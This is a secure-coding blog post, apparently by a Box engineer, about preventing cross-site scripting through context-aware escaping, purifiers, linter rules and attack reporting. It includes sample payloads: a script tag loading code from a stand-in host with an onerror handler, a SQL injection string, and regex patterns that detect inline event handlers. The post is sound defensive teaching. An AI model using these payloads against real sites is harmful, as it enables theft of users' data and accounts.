Secure Coding Practices

Introduction

First of all, take a look at the XSS Cheat Sheet and the HTML5 Security Cheat Sheet to see the many ways a website can be exploited using cross-site scripting (XSS) techniques. XSS can occur whenever a website prints or injects user-controlled text or HTML into a page without escaping it. When that text is stored by the site (for example, in a user profile) and shown to other users, the attack is called persistent XSS. Examples:
[php]
// Smarty
<p>Name: {$smarty.get.user_name}</p>

// PHP
<p><?php echo($_GET['user_name']); ?></p>

// JavaScript
document.write('Name: ' + json.userName);

// jQuery
jContainer.html('Name: ' + json.userName);
jContainer.append('<div class="icon" title="' + json.userName + '"></div>');
[/php]
Suppose that Mallory, a malicious user, enters the following into the "name" input field of his profile page:
"><script src="http://www.xss.com/attack.js"></script><img src="nothing.jpg" onerror="attack()"><"
When Alice views Mallory’s profile page, attack() is run* and her private information can easily be stolen.
* Script elements inserted using the native innerHTML are not executed, but many libraries, such as jQuery and dojo, download and execute the referenced script file when a script element is injected into the page.
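Here is why the attribute case is dangerous. The minimal sketch below mimics the last jQuery line above using plain string concatenation; the function name renderIconUnsafe is hypothetical. The leading quote in Mallory's name closes the title attribute early, so everything after it is parsed as new elements:

```javascript
// Hypothetical stand-in for the jQuery append() call above: the profile name
// is concatenated straight into a quoted title attribute, with no escaping.
function renderIconUnsafe(userName) {
  return '<div class="icon" title="' + userName + '"></div>';
}

// Mallory's profile name from the scenario above.
const malloryName =
  '"><script src="http://www.xss.com/attack.js"></script>' +
  '<img src="nothing.jpg" onerror="attack()"><"';

// The title attribute ends right after title=", and the script and img
// elements become real markup.
console.log(renderIconUnsafe(malloryName));
```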

Wrong Approaches

János Pásztor listed several approaches that are insufficient or not suitable for securing webapps:
  • strip_tags() – “I <3” is converted to “I ”, which is not desired
  • Escaping user input before storing – this ties the stored data to one output medium or platform, and the data will need to be unescaped at some point later, which can get very nasty because double escaping or double unescaping can easily occur
He pointed out that “filtering bad HTML with a regexp” is insufficient. Although there is no bulletproof way to secure a webapp, a carefully written regex library (blacklist) with logging can definitely make it harder for attackers to find security holes. And with community-supported whitelist libraries like Caja’s HTML Sanitizer, programming mistakes and potential security threats on the client side can be caught and reported.
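The problem with escaping before storing is easy to reproduce. In this sketch, escapeHtml is a hypothetical helper, roughly what PHP's htmlspecialchars() with ENT_QUOTES does. A comment is escaped once when it is saved and again by the template when it is displayed, so the reader ends up seeing entity text instead of the original comment:

```javascript
// Hypothetical HTML escaper for text and quoted attribute values.
// "&" must be replaced first so the entities added later are not re-escaped.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}

// Escaped once when the comment is saved to the database...
const stored = escapeHtml("I <3 XSS-free apps & tests");
// ...and escaped again by the template when it is displayed.
const displayed = escapeHtml(stored);
```

A browser renders displayed as “I &lt;3 XSS-free apps &amp; tests”, entities and all.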

Anti-XSS Coding Practices

Basic Coding Best Practices

Escape all User Inputs and Variables

User input has to be validated. In addition, any variable that could contain user input should be escaped when it is output. Most languages provide helper functions that escape special characters so that they are displayed as text instead of being interpreted as code.
[php]
// PHP – ideally, HTML should be written in the template
// But if it has to be in PHP... (ENT_QUOTES also escapes " and ')
<?php echo htmlspecialchars($_GET['user_name'], ENT_QUOTES | ENT_XHTML, 'UTF-8'); ?>

// Smarty – escape any user input
<p>{$smarty.get.user_name|escape:'html':'UTF-8'}</p>

// jQuery – use .text() to escape text – read on for more information
$('#user_name').text(userName);
[/php]
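Validation and escaping do different jobs. Validation rejects input that is not plausible for the field, and escaping makes whatever is accepted safe to print. The following JavaScript sketch assumes a hypothetical rule for display names; the pattern, length limit, and function names are illustrative. Note that a legitimate name like O'Brien passes validation and still contains a quote, which is why output escaping is needed regardless:

```javascript
// Hypothetical validation rule for a display name: 1-64 characters made of
// letters (any script), digits, spaces, apostrophes, periods and hyphens.
const USER_NAME_PATTERN = /^[\p{L}\p{N} .'-]{1,64}$/u;

function isValidUserName(input) {
  return typeof input === "string" && USER_NAME_PATTERN.test(input);
}

// Escape for HTML text and quoted attributes, similar in spirit to
// htmlspecialchars() with ENT_QUOTES.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}

// Validate on input, escape on output.
function renderUserName(input) {
  if (!isValidUserName(input)) {
    throw new Error("invalid user name");
  }
  return "<p>Name: " + escapeHtml(input) + "</p>";
}
```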

Escape based on Execution Context

One of the challenges of making applications secure is that the same string of code can be interpreted differently in different contexts. Each context requires its own method of escaping. For example, a user comment on a message board can say...
  • “Do not write anything like <script>alert()</script>!” This is a valid comment and should be stored in the database as is. It probably means nothing to the backend, but when it is inserted into the HTML context, it could be dangerous.
  • “\'; DROP TABLE users; --” This is totally valid for the purpose of displaying on the page using HTML, but when it is used to construct a SQL query, SQL injection could happen if it is not handled properly.
The first example, “Do not write anything like <script>alert()</script>!”, needs to be escaped when we display it on the page. The second one, "\'; DROP TABLE users; --", needs to be escaped (or, better, passed as a query parameter) when we save it into the database. Another example: a folder is named › PS?*"<>|<iframe src="www.box.com">, and it gets displayed in the breadcrumb of the Box webapp.
[php]
// BAD - Smarty code with "noescape"
<a id="p_11600290" href="#" class="path" title="{$path_html|noescape}" data-view_id="path_{}">...</a>

// Result: HTML breaks and the browser displays an iframe!
<a id="p_11600290" href="#" class="path" title="&#8250; PS?*"<>|<iframe src="www.box.com">" data-view_id="path_{}">...</a>

// GOOD - Smarty code with escape:'html'
<a id="p_11600290" href="#" class="path" title="{$path_html|escape:'html'}" data-view_id="path_{}">...</a>

// Result: HTML doesn't break
<a id="p_11600290" href="#" class="path" title="&amp;#8250; PS?*&quot;&lt;&gt;|&lt;iframe src=&quot;www.box.com&quot;&gt;" data-view_id="path_{}">...</a>
[/php]
Therefore, user input should keep its original form until just before it is interpreted. When data is passed to another context, do not escape it in advance. Let the receiving context escape it, because that context knows which escaping method applies. Content received from another context should always be escaped, because one context should not trust another.
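The breadcrumb results above can be reproduced in a few lines of JavaScript. This sketch assumes that Smarty's escape:'html' replaces &, <, >, " and ' with entities and does not skip existing entities, which is why &#8250; becomes &amp;#8250;. breadcrumbLink() is a hypothetical helper that drops the data-view_id attribute for brevity. The SQL context works differently. There, the usual fix is a parameterized query handled by the database driver rather than an escaping function, so it is not shown here.

```javascript
// Escape for the HTML attribute context (assumed equivalent of escape:'html').
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}

// The folder name from the breadcrumb example, as it reaches the template.
const pathHtml = '&#8250; PS?*"<>|<iframe src="www.box.com">';

// Hypothetical breadcrumb renderer that puts the title into a quoted attribute.
function breadcrumbLink(title) {
  return '<a id="p_11600290" href="#" class="path" title="' + title + '">...</a>';
}

const broken = breadcrumbLink(pathHtml);           // like |noescape
const safe = breadcrumbLink(escapeHtml(pathHtml)); // like |escape:'html'
```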

Remove Inline Events

Do not write inline event handlers in HTML. Inline events are a sign of poor JavaScript architecture, and they are an easy vector for XSS attacks. If an inline event handler reads user-provided input (as in the example below), the input has to be escaped before it is written into the handler, which makes the code very hard to author:
[php]
// Bad
<a href="#" onclick="Collborate({email: userEmail, name: userName}); return false;">Link</a>

// Bad
$ele.append('<a href="#" onclick="Collborate({email: userEmail, name: userName}); return false;">Link</a>');

// Bad - It is "safe," but we have to escape repeatedly every time we call this function inline
$ele.append('<a href="#" onclick="Collborate({email: $.text(userEmail), name: $.text(userName)}); return false;">Link</a>');

// Good
var $anchor = $('<a href="#"></a>');
$anchor.text('Link');
var safeEmail = $.text(userEmail);
var safeName = $.text(userName);
// The handler is attached in code, so no user data is written into markup
$anchor.on('click', function() {
  Collborate({email: safeEmail, name: safeName});
  return false;
});
$ele.append($anchor);
[/php]
The goal of having no inline events at all is that we can then add linter rules that prevent any developer from adding inline events that expose security holes. Living in an inline-event-free environment also lets us turn on a Content Security Policy (CSP) that blocks inline scripts, for greater XSS protection. Remember that we not only want to program securely, but also want to make it hard not to program securely.
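Once no inline handlers remain, a Content Security Policy can block them outright. The minimal sketch below assumes a Node-style response object with setHeader(). applyCsp is a hypothetical name, and the directives are an example to adapt, not a recommended final policy:

```javascript
// Example policy: scripts may only be loaded from the page's own origin.
// Because 'unsafe-inline' is not listed, browsers refuse to run inline
// <script> blocks and inline event-handler attributes such as onclick="...".
const CSP_POLICY = [
  "script-src 'self'",
  "object-src 'none'",
  "base-uri 'self'",
].join("; ");

// Works with any response object that has setHeader(), such as Node's
// http.ServerResponse.
function applyCsp(res) {
  res.setHeader("Content-Security-Policy", CSP_POLICY);
  return res;
}
```

In a Node server, applyCsp(res) would be called in the http.createServer() request handler before the body is written. Sending the same policy in a Content-Security-Policy-Report-Only header first reports violations without blocking anything.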

Avoid String Concatenation in DOM Manipulation APIs

Concatenating strings (or using Array.join()) to build markup makes it easy to forget that variables need to be escaped. It is good practice to avoid string concatenation entirely and force ourselves to use methods like .text(). Again, this practice should be enforced with linter rules.
[php]
// Bad
$('<div>' + json.user_name + '</div>');

// Bad
$('#user_url').append('<div id="user_' + json.user_id + '">' + json.user_name + '</div>');

// Good
var newDiv = $('<div></div>').text(json.user_name);
newDiv.attr('id', 'user_' + json.user_id); // assuming attr() would escape the input – read on...
$('#user_url').append(newDiv);
[/php]
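One way to make concatenation hard to get wrong, not taken from the original article, is a tagged template literal that escapes every interpolated value automatically. Only the developer-written literal parts are then treated as markup. A minimal sketch, where html and escapeHtml are hypothetical names:

```javascript
// Escape the characters that matter in HTML text and quoted attribute values.
// null and undefined become empty strings.
function escapeHtml(value) {
  return (value == null ? "" : String(value))
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}

// Tagged template: literal parts are trusted markup written by the developer;
// every ${value} is escaped before it is joined in.
function html(strings, ...values) {
  let out = strings[0];
  for (let i = 0; i < values.length; i++) {
    out += escapeHtml(values[i]) + strings[i + 1];
  }
  return out;
}

const json = { user_id: '7" onmouseover="attack()', user_name: "<b>Mallory</b>" };
const markup = html`<div id="user_${json.user_id}">${json.user_name}</div>`;
```

This only covers HTML text and quoted attribute values. Values placed in URLs, inline scripts, or unquoted attributes need different handling.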

Use the Right Content-Type HTTP Header

The Content-Type header of an XHR response must reflect the actual type of the content. If the server returns JSON that could contain user input (such as {"name": "<script>alert()</script>"}), it must use Content-Type: application/json. If text/html is used instead and the response is opened directly in the browser, it is rendered as HTML and the script could run.
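Below is a sketch of a JSON response helper. It assumes a Node-style response object with statusCode, setHeader() and end(), such as http.ServerResponse; sendJson is a hypothetical name. The X-Content-Type-Options: nosniff header is an addition not mentioned above. It tells browsers not to guess a different type from the body:

```javascript
// Send a JSON body with an explicit JSON content type, so browsers never
// treat user-controlled strings inside it as HTML.
function sendJson(res, statusCode, payload) {
  const body = JSON.stringify(payload);
  res.statusCode = statusCode;
  res.setHeader("Content-Type", "application/json; charset=utf-8");
  // Ask browsers not to MIME-sniff the body into something executable.
  res.setHeader("X-Content-Type-Options", "nosniff");
  res.end(body);
}
```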

jQuery API

.text()

According to jQuery’s documentation on .text():
We need to be aware that this method escapes the string provided as necessary so that it will render correctly in HTML. To do so, it calls the DOM method .createTextNode(), which replaces special characters with their HTML entity equivalents (such as &lt; for <).
At Box, we made the same escaping available as a utility function, $.text(val). Here is the implementation:
[javascript]
text: function(text, text_filter) {
  // Reuse a single detached <div> for every call
  if (!window['__c']) window['__c'] = document.createElement('div');
  var div = window['__c'];
  // Set the value as text, so the browser escapes it when innerHTML is read back
  if (typeof div.innerText != 'undefined') {
    div.innerText = text;
  } else {
    div.textContent = ((text === 0) ? text + '' : text || '');
  }
  // innerHTML escapes &, < and >, but not quotes; escape those for attribute values
  var prefiltered_text = div.innerHTML.replace(/"/g, '&quot;').replace(/'/g, '&#039;');
  if (text_filter) {
    return text_filter(prefiltered_text);
  }
  return prefiltered_text;
}
[/javascript]
The idea is that any text that could come from user input should be escaped using either $.text() or .text().
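Because the helper relies on the browser's own serializer, its output is easiest to see with a DOM-free equivalent. This sketch uses the hypothetical name boxStyleText and is not Box's code. It mirrors the textContent branch. Serializing a text node through innerHTML escapes &, <, > and the non-breaking space (U+00A0), and the helper then escapes " and '. In browsers that take the innerText branch, newlines become <br> elements, which this sketch does not reproduce.

```javascript
// DOM-free approximation of the textContent branch of $.text().
function boxStyleText(text, textFilter) {
  // Mirror the original: 0 becomes "0", other falsy values become "".
  const str = text === 0 ? "0" : String(text || "");
  const prefiltered = str
    .replace(/&/g, "&amp;")       // what innerHTML serialization does...
    .replace(/\u00a0/g, "&nbsp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")      // ...plus the helper's two extra replacements
    .replace(/'/g, "&#039;");
  return textFilter ? textFilter(prefiltered) : prefiltered;
}
```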

.html() and other DOM manipulation methods

jQuery's .html() executes script elements contained in the markup passed to it, and inline event handlers in that markup are attached as well. Even the native innerHTML attaches inline event handlers. For example, run the following in the browser console:
[javascript]
ele.innerHTML = '<img src="attack.js" onerror="alert(\'attack\')">'
> "<img src="attack.js" onerror="alert('attack')">"
> GET http://api.jquery.com/html/attack.js 404 (Not Found)
[/javascript]
Here, an alert shows up: the image request fails, so the onerror handler runs. Therefore, we need to be very careful about what gets passed to .html(). The same applies to other jQuery DOM manipulation methods, such as append(), appendTo(), prepend(), prependTo(), after(), before(), replaceWith(), attr(), and more. If you do use .html() (or another DOM manipulation method) with a markup string, escape the content before calling it:
[javascript]
// BAD
jEle.html('<div id="f_' + json.user_id + '">' + json.user_name + '</div>');

// THE SAFER WAY
var userId = $j.text(json.user_id);
var userName = $j.text(json.user_name);
jEle.html('<div id="f_' + userId + '">' + userName + '</div>');

// RECOMMENDED – THIS IS SAFE AND IS CLEAR
var jDiv = $j('<div></div>');
// attr() and text() set values through DOM APIs, so the input is never parsed as HTML
jDiv.attr('id', 'f_' + json.user_id).text(json.user_name);
// add to the DOM only when we're finished touching jDiv for better performance
jEle.append(jDiv);
[/javascript]

escape() in JavaScript?

In general, we should never use escape(). According to w3schools,
This function makes a string portable, so it can be transmitted across any network to any computer that supports ASCII characters. This function encodes special characters, with the exception of: * @ - _ + . /
escape() takes an extremely conservative approach that almost guarantees the string can be transmitted safely to any platform, but the result is not the original string in a displayable form. It has to be paired with unescape() to reverse the effect, which is hard to manage, especially in large apps, and double-escaping issues are common. Before we display any escaped text in the browser, it needs to be unescaped, but unescaped text can be dangerous. This makes escape() useless in this common scenario.
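Here is a short demonstration of these problems. It runs in Node or a browser console, since escape() and unescape() are deprecated but still available:

```javascript
const comment = "Tom & Jerry <3";

// escape() produces %XX sequences, not HTML entities, so the result is
// unreadable if displayed as-is...
const escaped = escape(comment);         // "Tom%20%26%20Jerry%20%3C3"
// ...escaping twice is easy to do by accident and hard to undo correctly...
const doubleEscaped = escape(escaped);   // "Tom%2520%2526%2520Jerry%2520%253C3"
// ...and unescape() restores the raw "<", which must not be written into
// HTML without proper HTML escaping.
const restored = unescape(escaped);      // "Tom & Jerry <3"

// Non-ASCII characters use a non-standard %uXXXX form instead of UTF-8.
const snowman = escape("\u2603");                   // "%u2603"
const snowmanUtf8 = encodeURIComponent("\u2603");   // "%E2%98%83"
```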

Escaping URLs

escape() does not work for whole URLs because it also encodes “?”, “=” and “&”, which are needed to structure them:
[javascript]
> escape('/index?user_name=david&department=engineering')
"/index%3Fuser_name%3Ddavid%26department%3Dengineering"
[/javascript]
URL-aware encoding functions should be used instead:
[php]
// PHP
<a href="http://www.box.com/?index=<?php echo urlencode($_GET['user_name']); ?>">Link</a>

// Smarty
<a href="http://www.box.com/?index={$smarty.get.user_name|escape:'url'}">Link</a>

// JavaScript – a URL component: encodes special characters, including , / ? : @ & = + $ #
'<a href="http://www.box.com/?index=' + encodeURIComponent(foo) + '">Link</a>'

// JavaScript – an entire URL: encodes special characters, except , / ? : @ & = + $ #
'<a href="' + encodeURI(foo) + '">Link</a>'
[/php]
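The sketch below covers both cases: encoding a single query-string value, and accepting a whole user-supplied URL. buildProfileUrl and safeHref are hypothetical names, and the http(s)-only rule is an assumption to adapt. The second function matters because encodeURI() leaves javascript:alert(1) unchanged, so encoding alone cannot stop a script URL in an href.

```javascript
// Encode the *value* with encodeURIComponent so that "&", "=", "?" and "#"
// inside it cannot add or change query parameters.
function buildProfileUrl(userName) {
  return "http://www.box.com/?index=" + encodeURIComponent(userName);
}

// Accept a user-supplied URL only if it parses and uses http or https.
// Relative URLs are resolved against an assumed base.
function safeHref(userUrl) {
  let parsed;
  try {
    parsed = new URL(userUrl, "http://www.box.com/");
  } catch (e) {
    return "#";
  }
  return parsed.protocol === "http:" || parsed.protocol === "https:" ? parsed.href : "#";
}
```

Whatever these functions return still has to be HTML-escaped when it is written into an attribute.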

Frameworks

jQuery

Be sure to use jQuery 1.8 or above, which has better XSS protection due to the separation of the content creation and element selection in $(). See jQuery 1.8 Beta 1: See What’s Coming (and Going!)

Client-side Purifier

Client-side purifiers are needed to purify:
  • HTML that is generated and injected into the DOM during run-time
  • XHR responses that are received from the server (it should not trust the network layer, and server can be third-party)
The purifier should be called every time a DOM manipulation method is used. In jQuery, there is an internal clean() function that does some basic cleaning, but it allows inline events and script elements to be created and executed. This function is a good candidate for the placement of a purifier. The expected behavior of a client-side purifier is illustrated in the following figure:
[Figure: client_side_purifier_example]
There are two major approaches: blacklist and whitelist.

Blacklist

A blacklist solution can be built in-house. It is a set of regex rules that match and remove XSS attacks. For example, /on(click|mouseover|mouseout|load)\s*=\s*["']?/gi matches some inline events. When a match is found, it should be removed and reported back to the logging server.
Pros
  • Small file size
  • Flexible and easy to maintain
  • Regex rules can be added easily
  • Logging for each individual regex rule is much easier
Cons
  • Able to catch the most obvious security risks, but any blacklist approach can be exploited by dedicated hackers
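Here is a minimal in-house blacklist sketch. It assumes a report(ruleName, match) callback that forwards each hit to the logging server. The rule names and patterns are illustrative. Unlike the example regex above, these patterns remove the whole attribute. Like any blacklist, they can be bypassed, and they can also strip harmless text (for instance, " one = two" matches the inline-event pattern).

```javascript
// Hypothetical blacklist rules. Each rule has a name so that every match can
// be logged per rule; the patterns are illustrative, not exhaustive.
const BLACKLIST_RULES = [
  { name: "inline-event", pattern: /\son[a-z]+\s*=\s*("[^"]*"|'[^']*'|[^\s>]*)/gi },
  { name: "script-tag", pattern: /<script\b[^>]*>[\s\S]*?<\/script\s*>/gi },
  { name: "javascript-url", pattern: /javascript\s*:/gi },
];

// Remove every match and report it through the supplied callback.
function blacklistPurify(html, report) {
  let result = html;
  for (const rule of BLACKLIST_RULES) {
    result = result.replace(rule.pattern, (match) => {
      report(rule.name, match);
      return "";
    });
  }
  return result;
}
```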

Whitelist

There are not many community-supported whitelist solutions for the client side. Caja’s HTML Sanitizer is the best-known one. It takes a predefined list of allowed HTML tags, attributes, and CSS properties, and removes anything not on the list. The sanitizer itself is widely tested by Google.
Pros
  • Proven and supported by a community
  • Fully tested
  • Much harder to bypass than an in-house blacklist
  • Whitelist approach is the more secure HTML purifying solution
Cons
  • Heavyweight: it adds page-load and bandwidth overhead (about 84KB minified and obfuscated)
  • Although it's not huge, it can have a negative performance impact, especially on older browsers (like IE7)
  • It needs to be upgraded or modified for any new HTML tags and properties introduced by the W3C or browser vendors
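Caja’s sanitizer is far more thorough, but the core whitelist idea fits in a short sketch. It assumes the markup has already been parsed by a real HTML parser into plain objects: { tag, attrs, children } for elements and strings for text. The allowed lists, the URL rule, and the function names are hypothetical. Anything not explicitly allowed is dropped, and all text and attribute values are escaped on output.

```javascript
// Hypothetical whitelist: everything not listed here is removed.
const ALLOWED_TAGS = new Set(["p", "b", "i", "em", "strong", "ul", "ol", "li", "a", "br"]);
const ALLOWED_ATTRS = { a: new Set(["href", "title"]) };
// Removed together with their content; other unknown elements are unwrapped.
const DROP_WITH_CONTENT = new Set(["script", "style", "iframe", "object", "embed"]);
const VOID_TAGS = new Set(["br"]);
// Only these URL forms are allowed in href.
const SAFE_URL = /^(https?:|mailto:|\/|#)/i;

function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}

// node: a string (text) or { tag, attrs, children } (element).
function sanitizeNode(node) {
  if (typeof node === "string") return escapeHtml(node);
  const tag = String(node.tag).toLowerCase();
  if (DROP_WITH_CONTENT.has(tag)) return "";
  const inner = (node.children || []).map(sanitizeNode).join("");
  if (!ALLOWED_TAGS.has(tag)) return inner; // unwrap: keep only sanitized content

  const allowedAttrs = ALLOWED_ATTRS[tag] || new Set();
  let attrs = "";
  for (const [name, value] of Object.entries(node.attrs || {})) {
    const key = name.toLowerCase();
    if (!allowedAttrs.has(key)) continue; // e.g. onclick, style
    if (key === "href" && !SAFE_URL.test(String(value).trim())) continue;
    attrs += " " + key + '="' + escapeHtml(value) + '"';
  }
  if (VOID_TAGS.has(tag)) return "<" + tag + attrs + ">";
  return "<" + tag + attrs + ">" + inner + "</" + tag + ">";
}
```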

Server-side Purifier

Server-side purifiers are needed to purify:
  • XHR responses (that can contain HTML fragments) that are sent back to the client
  • HTML generated from Smarty templates, PHP, or similar technologies
In addition to Caja, there are many open-source options available, including:

Linting

With code quality tools like JSHint and JSLint, appropriate linter rules can prevent developers from opening security holes by mistake. For example, concatenated markup strings passed to DOM manipulation methods or selectors are a harmful coding practice that we want to disallow with a linter rule. The following regular expression is another rule. It disallows any HTML that has event handlers (on*) preceded by whitespace or a quote, and any attribute value that starts with “javascript:”:
[javascript]
/((\s+|['"])on\w+\s*=\s*['"])|(\s*=\s*['"]javascript:[^'^"]*['"])/i
[/javascript]
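Outside of JSHint or JSLint, the same regular expression can be tried with a few lines of JavaScript. findViolations is a hypothetical helper that reports the line numbers a rule like this would flag. A real linter plugin would hook into the tool's own rule API instead.

```javascript
// The rule from above, unchanged.
const INLINE_HANDLER_OR_JS_URL = /((\s+|['"])on\w+\s*=\s*['"])|(\s*=\s*['"]javascript:[^'^"]*['"])/i;

// Hypothetical helper: return every line of a source string that the rule flags.
function findViolations(source) {
  const violations = [];
  source.split("\n").forEach((line, index) => {
    if (INLINE_HANDLER_OR_JS_URL.test(line)) {
      violations.push({ line: index + 1, text: line.trim() });
    }
  });
  return violations;
}
```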

Reporting

When the purifier catches potential attacks (such as an increased number of user inputs containing HTML), it should immediately report them back to the server so that they can be investigated. Add data visualization using graphs, and implement automatic alerting. Also watch the logs for SQL syntax errors, because they might indicate SQL injection attempts.
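The alerting side can be sketched as a single in-memory monitor that receives purifier reports and log lines. AttackMonitor, its options, and the threshold values are hypothetical; a production setup would use the team's metrics and alerting system. The SQL check matches MySQL’s syntax-error message; other databases word theirs differently.

```javascript
// MySQL's wording for syntax errors; other databases use different messages.
const SQL_SYNTAX_ERROR = /You have an error in your SQL syntax/i;

// Counts reports per rule within a sliding time window and calls `alert`
// when the count for a rule reaches the threshold.
class AttackMonitor {
  constructor({ windowMs, threshold, alert }) {
    this.windowMs = windowMs;
    this.threshold = threshold;
    this.alert = alert;
    this.events = new Map(); // rule name -> timestamps inside the window
  }

  report(rule, timestampMs = Date.now()) {
    const cutoff = timestampMs - this.windowMs;
    const recent = (this.events.get(rule) || []).filter((t) => t > cutoff);
    recent.push(timestampMs);
    this.events.set(rule, recent);
    if (recent.length === this.threshold) {
      this.alert(rule, recent.length);
    }
    return recent.length;
  }

  // Feed one server log line; SQL syntax errors are counted like purifier hits.
  scanLogLine(line, timestampMs = Date.now()) {
    return SQL_SYNTAX_ERROR.test(line) ? this.report("sql-syntax-error", timestampMs) : 0;
  }
}
```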

Conclusion

  • Never trust any user input. Validate input, and escape it only in the context where variables or user inputs are output.
  • Disallow bad coding practices (such as HTML inline events and HTML string concatenation) and enforce this with linter rules.
  • Use HTML purifiers (client-side and/or server-side) at the framework level.
  • Monitor the logs and automate alerting.
Additional Resources

  • JS Security With Untrusted Code
  • XSS Attacks: Cross Site Scripting Exploits and Defense (also on Amazon)
  • Box Tech Talk: Effective Approaches to Web Application Security by Zane Lackey

David is currently on the Box Web Application team developing scalable interfaces, where he also spends time experimenting with new technologies such as HTML5. He is a believer in best practices and performance optimization. His personal blog is at http://www.davidtong.me